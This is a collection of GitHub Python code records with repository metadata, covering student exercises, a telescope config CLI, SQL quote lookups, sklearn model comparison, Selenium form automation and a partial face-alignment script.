os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\n window.destroy()\non_opening()\nwindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nwindow.resizable(False, False)\nwindow.attributes('-topmost', 1)\nwindow.mainloop()\n# -------------------------------------------------------------- Current GUI ---------------------------------------------------------------------------------------\n# Code For .exe :\n# pyinstaller Books.py -n Books.io -w --add-binary chromedriver.exe;. -i book.png --add-data book.png;. --add-data entry_1.png;. --add-data entry_2.png;. 
--add-data button_1.png;.\n","repo_name":"RohitKonge/PDF-Version-of-any-Book","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":35211,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"}
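The Books.py record above tracks a Chrome download by polling the downloads folder for a `.crdownload` temp file. A minimal, self-contained sketch of that polling idea (the folder path, timeout and poll interval here are assumptions, not values taken from the record):

```python
# Hypothetical helper: wait for a Chrome download to finish by watching the
# temporary .crdownload file. Path, timeout and poll interval are assumptions.
import os
import time

def wait_for_chrome_download(downloads_path, timeout=300, poll=0.5):
    """Return the finished file name once no .crdownload remains, or None on timeout."""
    deadline = time.time() + timeout
    partial_name = None
    while time.time() < deadline:
        partial = [f for f in os.listdir(downloads_path) if f.endswith(".crdownload")]
        if partial:
            # Remember the in-progress name so the finished file can be reported later.
            partial_name = partial[0][: -len(".crdownload")]
        elif partial_name and os.path.exists(os.path.join(downloads_path, partial_name)):
            return partial_name
        time.sleep(poll)
    return None

# Usage (path is illustrative):
# finished = wait_for_chrome_download(os.path.expanduser("~/Downloads"))
```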
+{"seq_id":"32807061153","text":"import sys\r\n\r\nfrom student import Student, Grade\r\nfrom teacher import Teacher, Load\r\n\r\nstudent = []\r\nteacher = []\r\n\r\n\r\ndef addStudent():\r\n while True:\r\n print()\r\n print('T = Add Teacher')\r\n print('S = Add student')\r\n print()\r\n\r\n add = input('Choose T or S: ')\r\n add = add.upper()\r\n print()\r\n\r\n if add == 'S':\r\n idNum: str = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter First Name: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n year = input('Enter Year level: ')\r\n course = input('Enter Course: ')\r\n section = input('Enter Section: ')\r\n print('_____________________________________________________________________________________________________')\r\n introToComputing = int(input('Enter Introduction to Computing grade: '))\r\n archOrg = int(input('Enter Architecture and Organization grade: '))\r\n sysFun = int(input('Enter System Fundamentals grade: '))\r\n oop = int(input('Enter Object-oriented Programming grade: '))\r\n\r\n student1 = Grade(introToComputing, archOrg, sysFun, oop)\r\n student1.lastName = lastName\r\n student1.firstName = firstName\r\n student1.middleName = middleName\r\n student1.type = type\r\n student1.year = year\r\n student1.course = course\r\n student1.section = section\r\n student1.append(student1)\r\n\r\n\r\n elif add == 'T':\r\n idNum = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter FirstName: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n print('_____________________________________________________________________________________________________')\r\n department = input('Enter Department: ')\r\n position = input('Enter position: ')\r\n subjects = input('Enter Subjects: ')\r\n\r\n teacher1 = Load(subjects)\r\n teacher1.department = department\r\n teacher1.position = position\r\n teacher1.idNum = idNum\r\n teacher1.lastName = lastName\r\n teacher1.firstName = firstName\r\n teacher1.middleName = middleName\r\n teacher1.type = type\r\n teacher1.append(teacher1)\r\n\r\n else:\r\n menu()\r\n\r\n print()\r\n answer = input('Enter another? [y/n]: ')\r\n answer = answer.lower()\r\n\r\n if answer == 'y':\r\n break\r\n menu()\r\n\r\n\r\ndef delRecord():\r\n print()\r\n print('T = delete from Teacher')\r\n print('S = delete from Student')\r\n print('DT = Delete Teacher Record')\r\n print('DS = Delete Student Record')\r\n print('C = clear all')\r\n print()\r\n\r\n delete = input('What do you want to delete? ')\r\n delete = delete.upper()\r\n\r\n if delete == 'S':\r\n i: int = int(input('Enter Index number: '))\r\n student.pop(i)\r\n elif delete == 'T':\r\n i: int = int(input('Enter Index number: '))\r\n teacher.clear()\r\n elif delete == 'DT':\r\n teacher.clear()\r\n elif delete == 'DS':\r\n student.clear()\r\n elif delete == 'C':\r\n student.clear()\r\n teacher.clear()\r\n else:\r\n delRecord()\r\n\r\n menu()\r\n\r\n\r\ndef searRecord():\r\n print()\r\n print('T = search for Teacher')\r\n print('s - Search for Student')\r\n print()\r\n\r\n search = input('What type do you want to search? 
')\r\n search = search.upper()\r\n\r\n if search == 'S':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {student[i].getType()} \\t | {student[i].getName()} \\t | {student[i].getID()} \\t | {student[i].getYrCrSec()} \\t | {student[i].getAve()} ')\r\n elif search == 'T':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {teacher[i].getType()} \\t | {teacher[i].getName()} \\t | {teacher[i].getID()} \\t | {teacher[i].getDeptPost()} \\t | {teacher[i].getSub()}')\r\n else:\r\n searRecord()\r\n menu()\r\n\r\n\r\ndef displayRecord():\r\n print()\r\n print('TD = display teacher')\r\n print('SD - display student')\r\n print('DA - display all')\r\n print()\r\n\r\n display1 = input('What type do you want to display? ')\r\n display1 = display1.upper()\r\n\r\n if display1 == 'SD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'TD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'DA':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('-----------------------------------------------------------------------------------------------------')\r\n\r\n else:\r\n displayRecord()\r\n menu()\r\n\r\n\r\ndef menu():\r\n print('------------------Menu---------------------')\r\n print('DR - delete record SR - search record')\r\n print('A - add record M - display all')\r\n print()\r\n\r\n choice = input('Enter a function: ')\r\n choice = choice.upper()\r\n\r\n if (choice == 'DR'):\r\n delRecord()\r\n elif (choice == 'A'):\r\n addStudent()\r\n elif (choice == 'SR'):\r\n searRecord()\r\n elif (choice == 'M'):\r\n displayRecord()\r\n else:\r\n print()\r\n\r\n\r\nmenu()\r\n","repo_name":"maeannnn/Assignment","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
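The display.py record above calls `student1.append(student1)` and `teacher1.append(teacher1)`, which only works if `Grade`/`Load` happen to define an `append` method; the surrounding code suggests the intent is to store each new record in the module-level `student`/`teacher` lists. A hedged sketch of that intent using a small dataclass (the field names are illustrative, not the real `Grade` attributes):

```python
from dataclasses import dataclass, field

@dataclass
class StudentRecord:
    id_num: str
    last_name: str
    first_name: str
    grades: dict = field(default_factory=dict)

students = []

def add_student(id_num, last_name, first_name, grades=None):
    # Store the record in the module-level list (the original code calls
    # student1.append(student1) on the Grade instance instead).
    students.append(StudentRecord(id_num, last_name, first_name, grades or {}))

add_student("2023-001", "Smith", "Jan", {"oop": 90})
print(students[0])
```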
+{"seq_id":"30810760982","text":"\"\"\"\nCommand line utility for interacting with SKA Science Data Processor (SDP).\n\nUsage:\n ska-sdp COMMAND [options] [SDP_OBJECT] [...]\n ska-sdp COMMAND (-h|--help)\n ska-sdp (-h|--help)\n\nSDP Objects:\n pb Interact with processing blocks\n workflow Interact with available workflow definitions\n deployment Interact with deployments\n sbi Interact with scheduling block instances\n master Interact with Tango master device\n subarray Interact with Tango subarray device\n\nCommands:\n list List information of object from the Configuration DB\n get | watch Print all the information (i.e. value) of a key in the Config DB\n create Create a new, raw key-value pair in the Config DB;\n Run a workflow; Create a deployment\n update Update a raw key value from CLI\n edit Edit a raw key value from text editor\n delete Delete a single key or all keys within a path from the Config DB\n import Import workflow definitions from file or URL\n\"\"\"\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom ska_sdp_config import config\n\nfrom ska_sdp_config.ska_sdp_cli import (\n sdp_get,\n sdp_create,\n sdp_update,\n sdp_list,\n sdp_delete,\n sdp_import,\n)\n\nLOG = logging.getLogger(\"ska-sdp\")\nLOG.setLevel(logging.INFO)\nLOG.addHandler(logging.StreamHandler(sys.stdout))\n\nCOMMAND = \"COMMAND\"\n\n\ndef main(argv=None):\n \"\"\"Run ska-sdp.\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n args = docopt(__doc__, argv=argv, options_first=True)\n cfg = config.Config()\n\n if args[COMMAND] == \"list\":\n sdp_list.main(argv, cfg)\n\n elif args[COMMAND] == \"get\" or args[COMMAND] == \"watch\":\n sdp_get.main(argv, cfg)\n\n elif args[COMMAND] == \"create\":\n sdp_create.main(argv, cfg)\n\n elif args[COMMAND] == \"update\" or args[COMMAND] == \"edit\":\n sdp_update.main(argv, cfg)\n\n elif args[COMMAND] == \"delete\":\n sdp_delete.main(argv, cfg)\n\n elif args[COMMAND] == \"import\":\n sdp_import.main(argv, cfg)\n\n else:\n LOG.error(\n \"Command '%s' is not supported. Run 'ska-sdp --help' to view usage.\",\n args[COMMAND],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/sdp-config","sub_path":"src/ska_sdp_config/ska_sdp_cli/ska_sdp.py","file_name":"ska_sdp.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30650950835","text":"import sys\n\ndef find(n, k, s): # n은 순열의 인덱스, k는 이전 방문위치, s는 현재까지의 소모량\n global minV\n if n == N: # 순열이 완성된 경우\n s += e[k][0] # 사무실까지의 거리 추가\n if minV>s: # 기존의 최소값보다 작으면\n minV = s\n return\n elif minV <= s: # 순열이 완성되지 않았지만 합이 최소값보다 큰 경우\n return\n else:\n for i in range(1, N): # 순열의 n번 인덱스에 들어갈 숫자 선택\n if u[i] == 0:\n u[i] = 1\n find(n+1, i, s+e[k][i])\n u[i] = 0\n return\n\nsys.stdin = open('input.txt', 'r')\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n e = [list(map(int,input().split())) for x in range (N)]\n u = [0 for i in range(N+1)] # 사용한 숫자 표시\n p = [0 for i in range(N+1)] # 순열저장\n minV = 10000\n u[0] = 1 # 0번은 사무실이므로 고정\n find(1, 0, 0)\n print('#{} {}'.format(tc, minV))\n","repo_name":"pyjune/ssa2019","sub_path":"0326/전기카트2.py","file_name":"전기카트2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24781572479","text":"from cs50 import get_float\n\nwhile True:\n dollars = get_float(\"Change owed: \")\n if dollars > 0:\n break\n\ncents = dollars * 100\nquaters = cents // 25\ncents -= quaters * 25\ndimes = cents // 10\ncents -= dimes * 10\nnickels = cents // 5\ncents -= nickels * 5\npennies = cents // 1\n\nprint(int(quaters + dimes + nickels + pennies))\n","repo_name":"marsiekiera/CS50x","sub_path":"pset6/cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24232250315","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n '''递归方法,递归镜像左子节点和右子节点,结束条件是节点为根节点 O(n)'''\n if not root:\n return None\n else:\n root.left,root.right=self.mirrorTree(root.right),self.mirrorTree(root.left)\n return root\n #迭代法 每个子节点左右子树交换,然后组合O(n)\n if not root:return None\n #将二叉树中的节点逐层放入队列中,再迭代处理队列中的元素\n stack=[root]\n while stack:\n #每次从队列中拿一个节点,并交换这个节点的左右字数\n node=stack.pop(0)\n node.left, node.right = node.right, node.left\n #若当前节点的左子树不为空,放入队列等待后续处理\n if node.left:stack.append(node.left)\n # 若当前节点的右子树不为空,放入队列等待后续处理\n if node.right:stack.append(node.right)\n #返回处理完的根节点\n return root\n\n\n\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/27二叉树的镜像.py","file_name":"27二叉树的镜像.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74683391527","text":"#Provided is a list of data about a store’s inventory where each item in the list represents the name of an item, how much is in stock, and how much it costs. Print out each item in the list with the same formatting, using the .format method (not string concatenation). For example, the first print statment should read The store has 12 shoes, each for 29.99 USD.\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\nfor x in inventory:\n #print(x)\n #print(type(x))\n a=x.split(',')\n #print(a)\n item=a[1]\n name=a[0]\n cost=a[2]\n print('The store has{} {}, each for{} USD.'.format(item, name, cost))\n","repo_name":"gammarayburst999/Coursera","sub_path":"Python_Basics/Week_04/question_05.py","file_name":"question_05.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12906408876","text":"from project_shared import *\n\n\ndef is_table_exist(table_name, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT 1 FROM {table_name} LIMIT 1'\n result = connection.execute(query_string)\n return True if result else False\n except:\n return False\n\n\ndef ticker_lookup(ticker, table_name=QUOTE_TABLE_NAME, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT * FROM {table_name} WHERE ticker = \\'{ticker}\\' LIMIT 1'\n result = connection.execute(query_string)\n return True if result.rowcount > 0 else False\n except:\n return False\n\n\ndef get_quotes_by_ticker(ticker, start_date=None, end_date=None, table_name=QUOTE_TABLE_NAME, engine=engine):\n with engine.connect() as connection:\n try:\n query_string = f'SELECT dateTime, open, high, low, close FROM {table_name} WHERE ticker=\\'{ticker}\\''\n if start_date is not None:\n query_string += f' AND dateTime >= \\'{str(start_date)}\\' '\n if end_date is not None:\n query_string += f' AND dateTime <= \\'{str(end_date)}\\' '\n query_string += f' ORDER BY dateTime ASC'\n result = connection.execute(query_string)\n if result.rowcount > 0:\n # print(\"result.rowcount=\" + str(result.rowcount))\n return result.cursor.fetchall()\n else:\n return None\n except:\n return None\n","repo_name":"wideGenesis/upsilon_one","sub_path":"charter/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16483205035","text":"import sys\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# for test data set\nfrom sklearn.model_selection import train_test_split\n# for cross-validation\nfrom sklearn.model_selection import cross_val_score\n# for classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\n# for dimension reduction\nfrom sklearn.feature_selection import SequentialFeatureSelector\n\n\n# for order by desc. return second element for sort\ndef takeAccu(elem):\n return elem[1]\n \n\n# analyze on the input data set using several models \n# data: dataframe of input file\n# type: kNN, RandomForest, DecisionTree, SVM\n# problem: what to classfy\n# dimension_reduction: 'Y' yes, 'No' no\ndef analyze(data, model_type, problem, dimension_reduction = 'N'):\n\n for p in problem:\n # separate data into paramters(x) and a value(y)\n df = data.loc[data[0].isin(p)]\n x=df.iloc[:,1:]\n y=df.iloc[:,0]\n print('Classification problem: {}'.format(p))\n print('\\tPicked data: x {}, y {}\\n'.format(x.shape, y.shape))\n\n\n ###################################\n # dimension reduction\n ###################################\n if dimension_reduction == 'Y':\n x = greedyBackward(model_type, x, y)\n\n ###################################\n # set aside 10% for a test later\n ###################################\n X_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.1) \n\n ###################################\n # set category hyperparameters for each model\n ###################################\n if model_type == 'kNN':\n categories = ['ball_tree','kd_tree','brute']\n elif model_type == 'RandomForest':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'DecisionTree':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'SVM':\n categories = ['linear','poly','rbf']\n\n\n for category in categories:\n k_scores = []\n hyper_score = []\n k_range = range(1, 11)\n if model_type == 'SVM':\n k_range = [0.001, 0.005, 0.01, 0.05, 0.01, 0.5, 1, 3, 5, 10]\n\n ###################################\n # cross validation to find proper hyper parameter\n ################################### \n for k in k_range:\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=k)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=k)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=k)\n elif model_type == 'SVM':\n model = SVC(kernel=category, C=k)\n\n # do a Cross-validation test\n scores = cross_val_score(model, X_train, y_train, cv=5)\n k_scores.append(scores.mean())\n if True:\n print('Testing: cross-vali, model: {}, category param: {}, number param: {}, score: {}'.format(model_type, category, k, scores.mean()))\n\n hyper_score.append((k, scores.mean()))\n\n ###################################\n # choose best hyperparameter from the hyper value we test above\n # pick the hyper parameter that yeilds the hightest score(or accuracy) \n hyper_score.sort(key=takeAccu, reverse=True)\n bestHyper = hyper_score[0][0]\n\n ###################################\n # test with a final validation set\n ###################################\n start = time.time()\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=bestHyper)\n elif model_type == 'RandomForest':\n model = 
RandomForestClassifier(criterion=category, max_depth=bestHyper)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=bestHyper) \n elif model_type == 'SVM':\n model = SVC(kernel=category, C=bestHyper)\n\n model.fit(X_train, y_train) \n finalScore = model.score(X_test, y_test)\n end = time.time()\n print('Result : final-vali, model: {}, category param: {}, number param: {}, score: {}, time: {gap:.4f}\\n'.format(model_type, category, bestHyper, finalScore, gap = (end - start)))\n\n ###################################\n # show plot to see clearly\n ###################################\n if True:\n plt.plot(k_range, k_scores) \n plt.title('{} {} - Category param: {}, Reduced: {}'.format(p, model_type, category, dimension_reduction))\n plt.ylabel('Cross-Validated Accuracy')\n if model_type == 'kNN':\n plt.xlabel('Number param: k(how many neighbors)')\n elif model_type == 'RandomForest':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'DecisionTree':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'SVM':\n plt.xlabel('Number param: k(C, Regularization parameter)')\n plt.show()\n\n\n# reduce dimension on the input x, y\n# model_type: 'kNN', 'RandomForest', 'DecisionTree', 'SVM'\n# x,y: input data\n# howmany: how many features do you want to left\ndef greedyBackward(model_type, x, y, howmany = 4):\n print('Greedy Backward is in progress.')\n print('\\tbefore x shape: {}'.format(x.shape))\n\n if model_type == 'kNN':\n model = KNeighborsClassifier()\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(max_depth=5)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(max_depth=8)\n elif model_type == 'SVM':\n model = SVC()\n\n start = time.time()\n sfs = SequentialFeatureSelector(model, direction='backward', n_features_to_select=howmany, cv = 5)\n reduced_x = sfs.fit_transform(x,y)\n end = time.time()\n\n print('\\tafter x shape: {}'.format(reduced_x.shape))\n print('Reduced x: model {}, left features: {}, time: {gap:.4f}\\n'.format(model_type, sfs.get_feature_names_out(), gap = (end - start)))\n\n return reduced_x\n\n\ndef usage(exec_name):\n print('Usage:')\n print('\\tpython %s [arg1] [arg2] [arg3] [arg4]' % (exec_name))\n print('\\targ1: input data file')\n print('\\targ2: choose model. \"kNN\" \"RandomForest\" \"DecisionTree\" \"SVM\" are available')\n print('\\targ3: choose problem. 1:H,K 2:M,Y 3:I,J 4:H,K,M,Y,I,J') \n print('\\targ4: apply dimension reduction. 
Y,y:yes N,n:no') \n print('\\t\\tGreedy Backward Feature Elimination will be applied')\n print('Example:')\n print('\\tpython %s test.data kNN 1 N' % (exec_name))\n print('\\tpython %s test.data RandomForest 2 Y' % (exec_name))\n print('\\tpython %s test.data DecisionTree 3 N' % (exec_name))\n print('\\tpython %s test.data SVM 4 Y' % (exec_name))\n exit()\n\n\n# check arguments and return arguments\ndef checkarg(argv):\n if len(argv) != 5:\n usage(argv[0])\n else :\n model_type = argv[2]\n problem = argv[3]\n reduction = argv[4].upper()\n\n if not (argv[2] == 'kNN' or argv[2] == 'RandomForest' or argv[2] == 'DecisionTree' or argv[2] == 'SVM'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[2]))\n usage(argv[0])\n\n if not (argv[3] == '1' or argv[3] == '2' or argv[3] == '3' or argv[3] == '4'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[3]))\n usage(argv[0])\n\n if not (argv[4] == 'Y' or argv[4] == 'N'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[4]))\n usage(argv[0])\n \n test_problem = []\n if problem == '1':\n test_problem = [['H','K']]\n elif problem == '2':\n test_problem = [['M','Y']]\n elif problem == '3':\n test_problem = [['I','J']]\n elif problem == '4':\n test_problem = [['H','K','M','Y','I','J']]\n\n return [model_type, test_problem, reduction]\n\n\nif __name__ == '__main__':\n\n # check program parameter\n ret_arg = checkarg(sys.argv)\n model_type = ret_arg[0]\n problem = ret_arg[1]\n reduction = ret_arg[2]\n\n data=pd.read_csv(sys.argv[1],header=None)\n print('Loading data from file [{}]'.format(sys.argv[1]))\n print('\\t Loaded data: {}\\n'.format(data.shape))\n \n analyze(data, model_type, problem, reduction)","repo_name":"kbckbc/washu_fl22_cse514","sub_path":"train_model/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
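The model-selection script above hand-rolls the hyperparameter sweep with `cross_val_score` in a loop and then refits the best setting. The same sweep can be expressed with `GridSearchCV`; a self-contained sketch on stand-in data (the iris set, not the script's input file):

```python
# GridSearchCV runs the cross-validation loop and picks the best setting in one call.
from sklearn.datasets import load_iris
from sklearn.model_selection import GridSearchCV, train_test_split
from sklearn.neighbors import KNeighborsClassifier

X, y = load_iris(return_X_y=True)            # stand-in data for illustration
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=0)

param_grid = {
    "algorithm": ["ball_tree", "kd_tree", "brute"],
    "n_neighbors": list(range(1, 11)),
}
search = GridSearchCV(KNeighborsClassifier(), param_grid, cv=5)
search.fit(X_train, y_train)

print(search.best_params_, search.best_score_)
print("held-out score:", search.score(X_test, y_test))
```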
+{"seq_id":"19111386077","text":"def check_age(users, age):\n count = 0\n for i, user in enumerate(users):\n try:\n user_age = int(user['age'])\n except KeyError:\n print(f'Niepoprawne dane: {user}')\n except ValueError:\n print(f'Niepoprawny wiek: {user}')\n else:\n count += 1 if user_age < age else 0\n finally:\n print(f\"{i} - {user}\")\n return count\n\n\nvalid_data = [{'name': 'Jan', 'age': '10'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_date = [{}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_data2 = [{'name': 'Jan', 'age': 'age'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\n\nprint(check_age(valid_data, 15))\nprint(check_age(invalid_date, 15))\nprint(check_age(invalid_data2, 15))\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"kod_czwartek/bledy.py","file_name":"bledy.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20670189975","text":"# imagine we are writing a programme for Hospital in python and we need to check his name , if he is a existing patient , age , patient history and assign him to a doctor baseed on his need\n\n\n# taking his name \nname = 'Jhon Smith'\n# If he is a existing patient\nif_existing = False\n\n# age ( int )\n\nage = 20\n\n\n# new patiend?\n\nnew_Patient = True\n\n# patient History\n\n\npatient_History ='Fever , cough Probably Flu'\n\n# assigned Doctor\n\ndoctor = 'Dr. Tahia Rahman'\n\n\n# patient_conclusion = doctor + 'diagnosed that ' + name + age + 'has '+patient_History + 'its Flu' + 'his age is '+age+'and he is a '+new_Patient;","repo_name":"sakibahammed/python-fundamentals","sub_path":"hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4379286413","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nnavegador=webdriver.Chrome()\n\n# abrir a página index (entrar no site da busca jurídica)\nimport os\nimport time\nimport pandas as pd\n\ntabela=pd.read_excel('Processos.xlsx')\nprint(tabela)\n\ncaminho = os.getcwd()\narquivo = caminho + r\"\\index.html\"\n\nnavegador.get(arquivo)\n\nxpathDf='/html/body/div/div/div/a[1]'\nxpathRio='/html/body/div/div/div/a[2]'\nxpathSp='/html/body/div/div/div/a[3]'\nmenu=navegador.find_element(By.XPATH,'/html/body/div/div/button')\n\nfrom selenium.webdriver import ActionChains\n\nfor linha in tabela.index:\n if tabela.loc[linha,'Cidade']=='Distrito Federal':\n item=navegador.find_element(By.XPATH,xpathDf)\n elif tabela.loc[linha,'Cidade']=='Rio de Janeiro':\n item=navegador.find_element(By.XPATH,xpathRio)\n else:\n item=navegador.find_element(By.XPATH,xpathSp)\n ActionChains(navegador).move_to_element(menu).perform()\n time.sleep(2)\n item.click()\n time.sleep(2)\n listaAbas=navegador.window_handles\n\n abaOriginal=navegador.window_handles[0]\n novaAba=navegador.window_handles[1]\n navegador.switch_to.window(novaAba)\n\n try:\n navegador.find_element(By.ID,'nome').send_keys(tabela.loc[linha,'Nome'])\n navegador.find_element(By.ID,'advogado').send_keys(tabela.loc[linha,'Advogado'])\n navegador.find_element(By.ID,'numero').send_keys(tabela.loc[linha,'Processo'])\n navegador.find_element(By.XPATH,'//*[@id=\"formulario\"]/div/button').click()\n except:\n print('Elemento inexistente na aba/pagina atual')\n time.sleep(0.5)\n alerta=navegador.switch_to.alert\n alerta.accept()\n time.sleep(3)\n i=0\n while i<30:\n try:\n alerta=navegador.switch_to.alert\n if \"Processo encontrado com sucesso\" in alerta.text:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Encontrado\"\n else:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Não encontrado\"\n break\n except:\n time.sleep(2)\n i+=1\n \n navegador.close()\n navegador.switch_to.window(abaOriginal)\n\nprint(tabela)\ntabela.to_excel('ProcessosAtualizados.xlsx')\n\n\n\n\n\ntime.sleep(5)","repo_name":"jharbes/hashtagPython","sub_path":"028-automacaoWeb-selenium/26-exercicio-processoConsultaSites/exercicio-processoConsultaSites.py","file_name":"exercicio-processoConsultaSites.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37721284966","text":"import csv\n\n\n\ndef parse_ox_csv(filename):\n result = []\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n\n # pull of column names\n header = next(reader)\n for row in reader:\n result_row = []\n # pull off row names\n data = row[1:]\n for cell in data:\n try:\n result_row.append(float(cell))\n except ValueError:\n result_row.append(None)\n result.append(result_row)\n return result\n\nif __name__ == \"__main__\":\n\n t1 = parse_ox_csv(\"../resources/testdata/1/raw_data.csv\")\n print(t1[0])\n\n\n","repo_name":"rwalk/rsk","sub_path":"util/oxcsv.py","file_name":"oxcsv.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"19626249346","text":"import sys\r\nimport os\r\n\r\nfrom face_alignment import mtcnn\r\nimport argparse\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport random\r\nfrom datetime import datetime\r\nmtcnn_model = mtcnn.MTCNN(device='cpu', crop_size=(112, 112))\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef add_padding(pil_img, top, right, bottom, left, color=(0,0,0)):\r\n width, height = pil_img.size\r\n new_width = width + right + left\r\n new_height = height + top + bottom\r\n result = Image.new(pil_img.mode, (new_width, new_height), color)\r\n result.paste(pil_img, (left, top))\r\n return result\r\n\r\n\r\ndef get_aligned_face(image_path):\r\n img = cv2.cvtColor(image_path, cv2.COLOR_BGR2RGB) #ada2 ada3\r\n img = Image.fromarray(img)\r\n # find face\r\n try:\r\n bboxes, faces = mtcnn_model.align_multi(img, limit=1)\r\n face = faces[0]\r\n except Exception as e:\r\n face = None\r\n box=None\r\n\r\n if(face != None):\r\n 